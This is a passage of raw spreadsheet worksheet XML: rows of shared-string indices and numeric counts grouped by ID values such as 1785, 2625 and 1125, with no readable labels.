    </row>
    <row r="8314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8314" t="s">
        <v>16228</v>
      </c>
      <c r="B8314" t="s">
        <v>16213</v>
      </c>
      <c r="C8314">
        <v>0</v>
      </c>
      <c r="D8314">
        <v>1785</v>
      </c>
    </row>
    <row r="8315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8315" t="s">
        <v>16231</v>
      </c>
      <c r="B8315" t="s">
        <v>16214</v>
      </c>
      <c r="C8315">
        <v>0</v>
      </c>
      <c r="D8315">
        <v>1785</v>
      </c>
    </row>
    <row r="8316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8316" t="s">
        <v>16228</v>
      </c>
      <c r="B8316" t="s">
        <v>16215</v>
      </c>
      <c r="C8316">
        <v>8</v>
      </c>
      <c r="D8316">
        <v>1785</v>
      </c>
    </row>
    <row r="8317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8317" t="s">
        <v>16231</v>
      </c>
      <c r="B8317" t="s">
        <v>16216</v>
      </c>
      <c r="C8317">
        <v>12</v>
      </c>
      <c r="D8317">
        <v>1785</v>
      </c>
    </row>
    <row r="8318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8318" t="s">
        <v>16228</v>
      </c>
      <c r="B8318" t="s">
        <v>16217</v>
      </c>
      <c r="C8318">
        <v>16</v>
      </c>
      <c r="D8318">
        <v>1785</v>
      </c>
    </row>
    <row r="8319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8319" t="s">
        <v>16231</v>
      </c>
      <c r="B8319" t="s">
        <v>16218</v>
      </c>
      <c r="C8319">
        <v>60</v>
      </c>
      <c r="D8319">
        <v>1785</v>
      </c>
    </row>
    <row r="8320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8320" t="s">
        <v>16229</v>
      </c>
      <c r="B8320" t="s">
        <v>16219</v>
      </c>
      <c r="C8320">
        <v>0</v>
      </c>
      <c r="D8320">
        <v>1785</v>
      </c>
    </row>
    <row r="8321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8321" t="s">
        <v>16230</v>
      </c>
      <c r="B8321" t="s">
        <v>16220</v>
      </c>
      <c r="C8321">
        <v>0</v>
      </c>
      <c r="D8321">
        <v>1785</v>
      </c>
    </row>
    <row r="8322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8322" t="s">
        <v>16229</v>
      </c>
      <c r="B8322" t="s">
        <v>16221</v>
      </c>
      <c r="C8322">
        <v>0</v>
      </c>
      <c r="D8322">
        <v>1785</v>
      </c>
    </row>
    <row r="8323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8323" t="s">
        <v>16230</v>
      </c>
      <c r="B8323" t="s">
        <v>16222</v>
      </c>
      <c r="C8323">
        <v>35</v>
      </c>
      <c r="D8323">
        <v>1785</v>
      </c>
    </row>
    <row r="8324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8324" t="s">
        <v>16223</v>
      </c>
      <c r="B8324" t="s">
        <v>16223</v>
      </c>
      <c r="C8324">
        <v>31</v>
      </c>
      <c r="D8324">
        <v>1785</v>
      </c>
    </row>
    <row r="8325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8325" t="s">
        <v>16224</v>
      </c>
      <c r="B8325" t="s">
        <v>16224</v>
      </c>
      <c r="C8325">
        <v>0</v>
      </c>
      <c r="D8325">
        <v>1785</v>
      </c>
    </row>
    <row r="8326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8326" t="s">
        <v>16228</v>
      </c>
      <c r="B8326" t="s">
        <v>16211</v>
      </c>
      <c r="C8326">
        <v>0</v>
      </c>
      <c r="D8326">
        <v>2625</v>
      </c>
    </row>
    <row r="8327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8327" t="s">
        <v>16231</v>
      </c>
      <c r="B8327" t="s">
        <v>16212</v>
      </c>
      <c r="C8327">
        <v>0</v>
      </c>
      <c r="D8327">
        <v>2625</v>
      </c>
    </row>
    <row r="8328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8328" t="s">
        <v>16228</v>
      </c>
      <c r="B8328" t="s">
        <v>16213</v>
      </c>
      <c r="C8328">
        <v>0</v>
      </c>
      <c r="D8328">
        <v>2625</v>
      </c>
    </row>
    <row r="8329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8329" t="s">
        <v>16231</v>
      </c>
      <c r="B8329" t="s">
        <v>16214</v>
      </c>
      <c r="C8329">
        <v>0</v>
      </c>
      <c r="D8329">
        <v>2625</v>
      </c>
    </row>
    <row r="8330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8330" t="s">
        <v>16228</v>
      </c>
      <c r="B8330" t="s">
        <v>16215</v>
      </c>
      <c r="C8330">
        <v>2</v>
      </c>
      <c r="D8330">
        <v>2625</v>
      </c>
    </row>
    <row r="8331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8331" t="s">
        <v>16231</v>
      </c>
      <c r="B8331" t="s">
        <v>16216</v>
      </c>
      <c r="C8331">
        <v>1</v>
      </c>
      <c r="D8331">
        <v>2625</v>
      </c>
    </row>
    <row r="8332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8332" t="s">
        <v>16228</v>
      </c>
      <c r="B8332" t="s">
        <v>16217</v>
      </c>
      <c r="C8332">
        <v>0</v>
      </c>
      <c r="D8332">
        <v>2625</v>
      </c>
    </row>
    <row r="8333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8333" t="s">
        <v>16231</v>
      </c>
      <c r="B8333" t="s">
        <v>16218</v>
      </c>
      <c r="C8333">
        <v>0</v>
      </c>
      <c r="D8333">
        <v>2625</v>
      </c>
    </row>
    <row r="8334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8334" t="s">
        <v>16229</v>
      </c>
      <c r="B8334" t="s">
        <v>16219</v>
      </c>
      <c r="C8334">
        <v>0</v>
      </c>
      <c r="D8334">
        <v>2625</v>
      </c>
    </row>
    <row r="8335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8335" t="s">
        <v>16230</v>
      </c>
      <c r="B8335" t="s">
        <v>16220</v>
      </c>
      <c r="C8335">
        <v>0</v>
      </c>
      <c r="D8335">
        <v>2625</v>
      </c>
    </row>
    <row r="8336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8336" t="s">
        <v>16229</v>
      </c>
      <c r="B8336" t="s">
        <v>16221</v>
      </c>
      <c r="C8336">
        <v>10</v>
      </c>
      <c r="D8336">
        <v>2625</v>
      </c>
    </row>
    <row r="8337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8337" t="s">
        <v>16230</v>
      </c>
      <c r="B8337" t="s">
        <v>16222</v>
      </c>
      <c r="C8337">
        <v>0</v>
      </c>
      <c r="D8337">
        <v>2625</v>
      </c>
    </row>
    <row r="8338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8338" t="s">
        <v>16223</v>
      </c>
      <c r="B8338" t="s">
        <v>16223</v>
      </c>
      <c r="C8338">
        <v>30</v>
      </c>
      <c r="D8338">
        <v>2625</v>
      </c>
    </row>
    <row r="8339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8339" t="s">
        <v>16224</v>
      </c>
      <c r="B8339" t="s">
        <v>16224</v>
      </c>
      <c r="C8339">
        <v>1</v>
      </c>
      <c r="D8339">
        <v>2625</v>
      </c>
    </row>
    <row r="8340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8340" t="s">
        <v>16228</v>
      </c>
      <c r="B8340" t="s">
        <v>16211</v>
      </c>
      <c r="C8340">
        <v>1</v>
      </c>
      <c r="D8340">
        <v>1125</v>
      </c>
    </row>
    <row r="8341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8341" t="s">
        <v>16231</v>
      </c>
      <c r="B8341" t="s">
        <v>16212</v>
      </c>
      <c r="C8341">
        <v>2</v>
      </c>
      <c r="D8341">
        <v>1125</v>
      </c>
    </row>
    <row r="8342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8342" t="s">
        <v>16228</v>
      </c>
      <c r="B8342" t="s">
        <v>16213</v>
      </c>
      <c r="C8342">
        <v>0</v>
      </c>
      <c r="D8342">
        <v>1125</v>
      </c>
    </row>
    <row r="8343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8343" t="s">
        <v>16231</v>
      </c>
      <c r="B8343" t="s">
        <v>16214</v>
      </c>
      <c r="C8343">
        <v>0</v>
      </c>
      <c r="D8343">
        <v>1125</v>
      </c>
    </row>
    <row r="8344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8344" t="s">
        <v>16228</v>
      </c>
      <c r="B8344" t="s">
        <v>16215</v>
      </c>
      <c r="C8344">
        <v>18</v>
      </c>
      <c r="D8344">
        <v>1125</v>
      </c>
    </row>
    <row r="8345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8345" t="s">
        <v>16231</v>
      </c>
      <c r="B8345" t="s">
        <v>16216</v>
      </c>
      <c r="C8345">
        <v>2</v>
      </c>
      <c r="D8345">
        <v>1125</v>
      </c>
    </row>
    <row r="8346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8346" t="s">
        <v>16228</v>
      </c>
      <c r="B8346" t="s">
        <v>16217</v>
      </c>
      <c r="C8346">
        <v>0</v>
      </c>
      <c r="D8346">
        <v>1125</v>
      </c>
    </row>
    <row r="8347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8347" t="s">
        <v>16231</v>
      </c>
      <c r="B8347" t="s">
        <v>16218</v>
      </c>
      <c r="C8347">
        <v>0</v>
      </c>
      <c r="D8347">
        <v>1125</v>
      </c>
    </row>
    <row r="8348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8348" t="s">
        <v>16229</v>
      </c>
      <c r="B8348" t="s">
        <v>16219</v>
      </c>
      <c r="C8348">
        <v>5</v>
      </c>
      <c r="D8348">
        <v>1125</v>
      </c>
    </row>
    <row r="8349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8349" t="s">
        <v>16230</v>
      </c>
      <c r="B8349" t="s">
        <v>16220</v>
      </c>
      <c r="C8349">
        <v>0</v>
      </c>
      <c r="D8349">
        <v>1125</v>
      </c>
    </row>
    <row r="8350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8350" t="s">
        <v>16229</v>
      </c>
      <c r="B8350" t="s">
        <v>16221</v>
      </c>
      <c r="C8350">
        <v>0</v>
      </c>
      <c r="D8350">
        <v>1125</v>
      </c>
    </row>
    <row r="8351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8351" t="s">
        <v>16230</v>
      </c>
      <c r="B8351" t="s">
        <v>16222</v>
      </c>
      <c r="C8351">
        <v>0</v>
      </c>
      <c r="D8351">
        <v>1125</v>
      </c>
    </row>
    <row r="8352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8352" t="s">
        <v>16223</v>
      </c>
      <c r="B8352" t="s">
        <v>16223</v>
      </c>
      <c r="C8352">
        <v>0</v>
      </c>
      <c r="D8352">
        <v>1125</v>
      </c>
    </row>
    <row r="8353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8353" t="s">
        <v>16224</v>
      </c>
      <c r="B8353" t="s">
        <v>16224</v>
      </c>
      <c r="C8353">
        <v>0</v>
      </c>
      <c r="D8353">
        <v>1125</v>
      </c>
    </row>
    <row r="8354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8354" t="s">
        <v>16228</v>
      </c>
      <c r="B8354" t="s">
        <v>16211</v>
      </c>
      <c r="C8354">
        <v>0</v>
      </c>
      <c r="D8354">
        <v>427</v>
      </c>
    </row>
    <row r="8355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8355" t="s">
        <v>16231</v>
      </c>
      <c r="B8355" t="s">
        <v>16212</v>
      </c>
      <c r="C8355">
        <v>0</v>
      </c>
      <c r="D8355">
        <v>427</v>
      </c>
    </row>
    <row r="8356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8356" t="s">
        <v>16228</v>
      </c>
      <c r="B8356" t="s">
        <v>16213</v>
      </c>
      <c r="C8356">
        <v>0</v>
      </c>
      <c r="D8356">
        <v>427</v>
      </c>
    </row>
    <row r="8357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8357" t="s">
        <v>16231</v>
      </c>
      <c r="B8357" t="s">
        <v>16214</v>
      </c>
      <c r="C8357">
        <v>0</v>
      </c>
      <c r="D8357">
        <v>427</v>
      </c>
    </row>
    <row r="8358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8358" t="s">
        <v>16228</v>
      </c>
      <c r="B8358" t="s">
        <v>16215</v>
      </c>
      <c r="C8358">
        <v>3</v>
      </c>
      <c r="D8358">
        <v>427</v>
      </c>
    </row>
    <row r="8359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8359" t="s">
        <v>16231</v>
      </c>
      <c r="B8359" t="s">
        <v>16216</v>
      </c>
      <c r="C8359">
        <v>2</v>
      </c>
      <c r="D8359">
        <v>427</v>
      </c>
    </row>
    <row r="8360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8360" t="s">
        <v>16228</v>
      </c>
      <c r="B8360" t="s">
        <v>16217</v>
      </c>
      <c r="C8360">
        <v>1</v>
      </c>
      <c r="D8360">
        <v>427</v>
      </c>
    </row>
    <row r="8361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8361" t="s">
        <v>16231</v>
      </c>
      <c r="B8361" t="s">
        <v>16218</v>
      </c>
      <c r="C8361">
        <v>0</v>
      </c>
      <c r="D8361">
        <v>427</v>
      </c>
    </row>
    <row r="8362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8362" t="s">
        <v>16229</v>
      </c>
      <c r="B8362" t="s">
        <v>16219</v>
      </c>
      <c r="C8362">
        <v>0</v>
      </c>
      <c r="D8362">
        <v>427</v>
      </c>
    </row>
    <row r="8363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8363" t="s">
        <v>16230</v>
      </c>
      <c r="B8363" t="s">
        <v>16220</v>
      </c>
      <c r="C8363">
        <v>0</v>
      </c>
      <c r="D8363">
        <v>427</v>
      </c>
    </row>
    <row r="8364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8364" t="s">
        <v>16229</v>
      </c>
      <c r="B8364" t="s">
        <v>16221</v>
      </c>
      <c r="C8364">
        <v>6</v>
      </c>
      <c r="D8364">
        <v>427</v>
      </c>
    </row>
    <row r="8365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8365" t="s">
        <v>16230</v>
      </c>
      <c r="B8365" t="s">
        <v>16222</v>
      </c>
      <c r="C8365">
        <v>0</v>
      </c>
      <c r="D8365">
        <v>427</v>
      </c>
    </row>
    <row r="8366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8366" t="s">
        <v>16223</v>
      </c>
      <c r="B8366" t="s">
        <v>16223</v>
      </c>
      <c r="C8366">
        <v>25</v>
      </c>
      <c r="D8366">
        <v>427</v>
      </c>
    </row>
    <row r="8367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8367" t="s">
        <v>16224</v>
      </c>
      <c r="B8367" t="s">
        <v>16224</v>
      </c>
      <c r="C8367">
        <v>1</v>
      </c>
      <c r="D8367">
        <v>427</v>
      </c>
    </row>
    <row r="8368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8368" t="s">
        <v>16228</v>
      </c>
      <c r="B8368" t="s">
        <v>16211</v>
      </c>
      <c r="C8368">
        <v>0</v>
      </c>
      <c r="D8368">
        <v>119</v>
      </c>
    </row>
    <row r="8369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8369" t="s">
        <v>16231</v>
      </c>
      <c r="B8369" t="s">
        <v>16212</v>
      </c>
      <c r="C8369">
        <v>0</v>
      </c>
      <c r="D8369">
        <v>119</v>
      </c>
    </row>
    <row r="8370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8370" t="s">
        <v>16228</v>
      </c>
      <c r="B8370" t="s">
        <v>16213</v>
      </c>
      <c r="C8370">
        <v>0</v>
      </c>
      <c r="D8370">
        <v>119</v>
      </c>
    </row>
    <row r="8371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8371" t="s">
        <v>16231</v>
      </c>
      <c r="B8371" t="s">
        <v>16214</v>
      </c>
      <c r="C8371">
        <v>0</v>
      </c>
      <c r="D8371">
        <v>119</v>
      </c>
    </row>
    <row r="8372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8372" t="s">
        <v>16228</v>
      </c>
      <c r="B8372" t="s">
        <v>16215</v>
      </c>
      <c r="C8372">
        <v>0</v>
      </c>
      <c r="D8372">
        <v>119</v>
      </c>
    </row>
    <row r="8373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8373" t="s">
        <v>16231</v>
      </c>
      <c r="B8373" t="s">
        <v>16216</v>
      </c>
      <c r="C8373">
        <v>3</v>
      </c>
      <c r="D8373">
        <v>119</v>
      </c>
    </row>
    <row r="8374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8374" t="s">
        <v>16228</v>
      </c>
      <c r="B8374" t="s">
        <v>16217</v>
      </c>
      <c r="C8374">
        <v>12</v>
      </c>
      <c r="D8374">
        <v>119</v>
      </c>
    </row>
    <row r="8375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8375" t="s">
        <v>16231</v>
      </c>
      <c r="B8375" t="s">
        <v>16218</v>
      </c>
      <c r="C8375">
        <v>0</v>
      </c>
      <c r="D8375">
        <v>119</v>
      </c>
    </row>
    <row r="8376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8376" t="s">
        <v>16229</v>
      </c>
      <c r="B8376" t="s">
        <v>16219</v>
      </c>
      <c r="C8376">
        <v>0</v>
      </c>
      <c r="D8376">
        <v>119</v>
      </c>
    </row>
    <row r="8377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8377" t="s">
        <v>16230</v>
      </c>
      <c r="B8377" t="s">
        <v>16220</v>
      </c>
      <c r="C8377">
        <v>0</v>
      </c>
      <c r="D8377">
        <v>119</v>
      </c>
    </row>
    <row r="8378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8378" t="s">
        <v>16229</v>
      </c>
      <c r="B8378" t="s">
        <v>16221</v>
      </c>
      <c r="C8378">
        <v>5</v>
      </c>
      <c r="D8378">
        <v>119</v>
      </c>
    </row>
    <row r="8379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8379" t="s">
        <v>16230</v>
      </c>
      <c r="B8379" t="s">
        <v>16222</v>
      </c>
      <c r="C8379">
        <v>25</v>
      </c>
      <c r="D8379">
        <v>119</v>
      </c>
    </row>
    <row r="8380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8380" t="s">
        <v>16223</v>
      </c>
      <c r="B8380" t="s">
        <v>16223</v>
      </c>
      <c r="C8380">
        <v>25</v>
      </c>
      <c r="D8380">
        <v>119</v>
      </c>
    </row>
    <row r="8381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8381" t="s">
        <v>16224</v>
      </c>
      <c r="B8381" t="s">
        <v>16224</v>
      </c>
      <c r="C8381">
        <v>1</v>
      </c>
      <c r="D8381">
        <v>119</v>
      </c>
    </row>
    <row r="8382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8382" t="s">
        <v>16228</v>
      </c>
      <c r="B8382" t="s">
        <v>16211</v>
      </c>
      <c r="C8382">
        <v>0</v>
      </c>
      <c r="D8382">
        <v>4779</v>
      </c>
    </row>
    <row r="8383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8383" t="s">
        <v>16231</v>
      </c>
      <c r="B8383" t="s">
        <v>16212</v>
      </c>
      <c r="C8383">
        <v>0</v>
      </c>
      <c r="D8383">
        <v>4779</v>
      </c>
    </row>
    <row r="8384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8384" t="s">
        <v>16228</v>
      </c>
      <c r="B8384" t="s">
        <v>16213</v>
      </c>
      <c r="C8384">
        <v>0</v>
      </c>
      <c r="D8384">
        <v>4779</v>
      </c>
    </row>
    <row r="8385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8385" t="s">
        <v>16231</v>
      </c>
      <c r="B8385" t="s">
        <v>16214</v>
      </c>
      <c r="C8385">
        <v>0</v>
      </c>
      <c r="D8385">
        <v>4779</v>
      </c>
    </row>
    <row r="8386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8386" t="s">
        <v>16228</v>
      </c>
      <c r="B8386" t="s">
        <v>16215</v>
      </c>
      <c r="C8386">
        <v>2</v>
      </c>
      <c r="D8386">
        <v>4779</v>
      </c>
    </row>
    <row r="8387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8387" t="s">
        <v>16231</v>
      </c>
      <c r="B8387" t="s">
        <v>16216</v>
      </c>
      <c r="C8387">
        <v>0</v>
      </c>
      <c r="D8387">
        <v>4779</v>
      </c>
    </row>
    <row r="8388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8388" t="s">
        <v>16228</v>
      </c>
      <c r="B8388" t="s">
        <v>16217</v>
      </c>
      <c r="C8388">
        <v>0</v>
      </c>
      <c r="D8388">
        <v>4779</v>
      </c>
    </row>
    <row r="8389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8389" t="s">
        <v>16231</v>
      </c>
      <c r="B8389" t="s">
        <v>16218</v>
      </c>
      <c r="C8389">
        <v>0</v>
      </c>
      <c r="D8389">
        <v>4779</v>
      </c>
    </row>
    <row r="8390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8390" t="s">
        <v>16229</v>
      </c>
      <c r="B8390" t="s">
        <v>16219</v>
      </c>
      <c r="C8390">
        <v>1</v>
      </c>
      <c r="D8390">
        <v>4779</v>
      </c>
    </row>
    <row r="8391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8391" t="s">
        <v>16230</v>
      </c>
      <c r="B8391" t="s">
        <v>16220</v>
      </c>
      <c r="C8391">
        <v>4</v>
      </c>
      <c r="D8391">
        <v>4779</v>
      </c>
    </row>
    <row r="8392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8392" t="s">
        <v>16229</v>
      </c>
      <c r="B8392" t="s">
        <v>16221</v>
      </c>
      <c r="C8392">
        <v>14</v>
      </c>
      <c r="D8392">
        <v>4779</v>
      </c>
    </row>
    <row r="8393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8393" t="s">
        <v>16230</v>
      </c>
      <c r="B8393" t="s">
        <v>16222</v>
      </c>
      <c r="C8393">
        <v>54</v>
      </c>
      <c r="D8393">
        <v>4779</v>
      </c>
    </row>
    <row r="8394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8394" t="s">
        <v>16223</v>
      </c>
      <c r="B8394" t="s">
        <v>16223</v>
      </c>
      <c r="C8394">
        <v>1</v>
      </c>
      <c r="D8394">
        <v>4779</v>
      </c>
    </row>
    <row r="8395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8395" t="s">
        <v>16224</v>
      </c>
      <c r="B8395" t="s">
        <v>16224</v>
      </c>
      <c r="C8395">
        <v>1</v>
      </c>
      <c r="D8395">
        <v>4779</v>
      </c>
    </row>
    <row r="8396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8396" t="s">
        <v>16228</v>
      </c>
      <c r="B8396" t="s">
        <v>16211</v>
      </c>
      <c r="C8396">
        <v>0</v>
      </c>
      <c r="D8396">
        <v>622</v>
      </c>
    </row>
    <row r="8397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8397" t="s">
        <v>16231</v>
      </c>
      <c r="B8397" t="s">
        <v>16212</v>
      </c>
      <c r="C8397">
        <v>0</v>
      </c>
      <c r="D8397">
        <v>622</v>
      </c>
    </row>
    <row r="8398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8398" t="s">
        <v>16228</v>
      </c>
      <c r="B8398" t="s">
        <v>16213</v>
      </c>
      <c r="C8398">
        <v>0</v>
      </c>
      <c r="D8398">
        <v>622</v>
      </c>
    </row>
    <row r="8399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8399" t="s">
        <v>16231</v>
      </c>
      <c r="B8399" t="s">
        <v>16214</v>
      </c>
      <c r="C8399">
        <v>0</v>
      </c>
      <c r="D8399">
        <v>622</v>
      </c>
    </row>
    <row r="8400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8400" t="s">
        <v>16228</v>
      </c>
      <c r="B8400" t="s">
        <v>16215</v>
      </c>
      <c r="C8400">
        <v>2</v>
      </c>
      <c r="D8400">
        <v>622</v>
      </c>
    </row>
    <row r="8401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8401" t="s">
        <v>16231</v>
      </c>
      <c r="B8401" t="s">
        <v>16216</v>
      </c>
      <c r="C8401">
        <v>1</v>
      </c>
      <c r="D8401">
        <v>622</v>
      </c>
    </row>
    <row r="8402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8402" t="s">
        <v>16228</v>
      </c>
      <c r="B8402" t="s">
        <v>16217</v>
      </c>
      <c r="C8402">
        <v>0</v>
      </c>
      <c r="D8402">
        <v>622</v>
      </c>
    </row>
    <row r="8403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8403" t="s">
        <v>16231</v>
      </c>
      <c r="B8403" t="s">
        <v>16218</v>
      </c>
      <c r="C8403">
        <v>0</v>
      </c>
      <c r="D8403">
        <v>622</v>
      </c>
    </row>
    <row r="8404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8404" t="s">
        <v>16229</v>
      </c>
      <c r="B8404" t="s">
        <v>16219</v>
      </c>
      <c r="C8404">
        <v>12</v>
      </c>
      <c r="D8404">
        <v>622</v>
      </c>
    </row>
    <row r="8405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8405" t="s">
        <v>16230</v>
      </c>
      <c r="B8405" t="s">
        <v>16220</v>
      </c>
      <c r="C8405">
        <v>0</v>
      </c>
      <c r="D8405">
        <v>622</v>
      </c>
    </row>
    <row r="8406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8406" t="s">
        <v>16229</v>
      </c>
      <c r="B8406" t="s">
        <v>16221</v>
      </c>
      <c r="C8406">
        <v>0</v>
      </c>
      <c r="D8406">
        <v>622</v>
      </c>
    </row>
    <row r="8407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8407" t="s">
        <v>16230</v>
      </c>
      <c r="B8407" t="s">
        <v>16222</v>
      </c>
      <c r="C8407">
        <v>0</v>
      </c>
      <c r="D8407">
        <v>622</v>
      </c>
    </row>
    <row r="8408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8408" t="s">
        <v>16223</v>
      </c>
      <c r="B8408" t="s">
        <v>16223</v>
      </c>
      <c r="C8408">
        <v>27</v>
      </c>
      <c r="D8408">
        <v>622</v>
      </c>
    </row>
    <row r="8409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8409" t="s">
        <v>16224</v>
      </c>
      <c r="B8409" t="s">
        <v>16224</v>
      </c>
      <c r="C8409">
        <v>1</v>
      </c>
      <c r="D8409">
        <v>622</v>
      </c>
    </row>
    <row r="8410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8410" t="s">
        <v>16228</v>
      </c>
      <c r="B8410" t="s">
        <v>16211</v>
      </c>
      <c r="C8410">
        <v>0</v>
      </c>
      <c r="D8410">
        <v>594</v>
      </c>
    </row>
    <row r="8411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8411" t="s">
        <v>16231</v>
      </c>
      <c r="B8411" t="s">
        <v>16212</v>
      </c>
      <c r="C8411">
        <v>0</v>
      </c>
      <c r="D8411">
        <v>594</v>
      </c>
    </row>
    <row r="8412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8412" t="s">
        <v>16228</v>
      </c>
      <c r="B8412" t="s">
        <v>16213</v>
      </c>
      <c r="C8412">
        <v>0</v>
      </c>
      <c r="D8412">
        <v>594</v>
      </c>
    </row>
    <row r="8413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8413" t="s">
        <v>16231</v>
      </c>
      <c r="B8413" t="s">
        <v>16214</v>
      </c>
      <c r="C8413">
        <v>0</v>
      </c>
      <c r="D8413">
        <v>594</v>
      </c>
    </row>
    <row r="8414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8414" t="s">
        <v>16228</v>
      </c>
      <c r="B8414" t="s">
        <v>16215</v>
      </c>
      <c r="C8414">
        <v>3</v>
      </c>
      <c r="D8414">
        <v>594</v>
      </c>
    </row>
    <row r="8415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8415" t="s">
        <v>16231</v>
      </c>
      <c r="B8415" t="s">
        <v>16216</v>
      </c>
      <c r="C8415">
        <v>1</v>
      </c>
      <c r="D8415">
        <v>594</v>
      </c>
    </row>
    <row r="8416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8416" t="s">
        <v>16228</v>
      </c>
      <c r="B8416" t="s">
        <v>16217</v>
      </c>
      <c r="C8416">
        <v>3</v>
      </c>
      <c r="D8416">
        <v>594</v>
      </c>
    </row>
    <row r="8417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8417" t="s">
        <v>16231</v>
      </c>
      <c r="B8417" t="s">
        <v>16218</v>
      </c>
      <c r="C8417">
        <v>1</v>
      </c>
      <c r="D8417">
        <v>594</v>
      </c>
    </row>
    <row r="8418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8418" t="s">
        <v>16229</v>
      </c>
      <c r="B8418" t="s">
        <v>16219</v>
      </c>
      <c r="C8418">
        <v>1</v>
      </c>
      <c r="D8418">
        <v>594</v>
      </c>
    </row>
    <row r="8419" spans="1:4" x14ac:dyDescent="0.2">
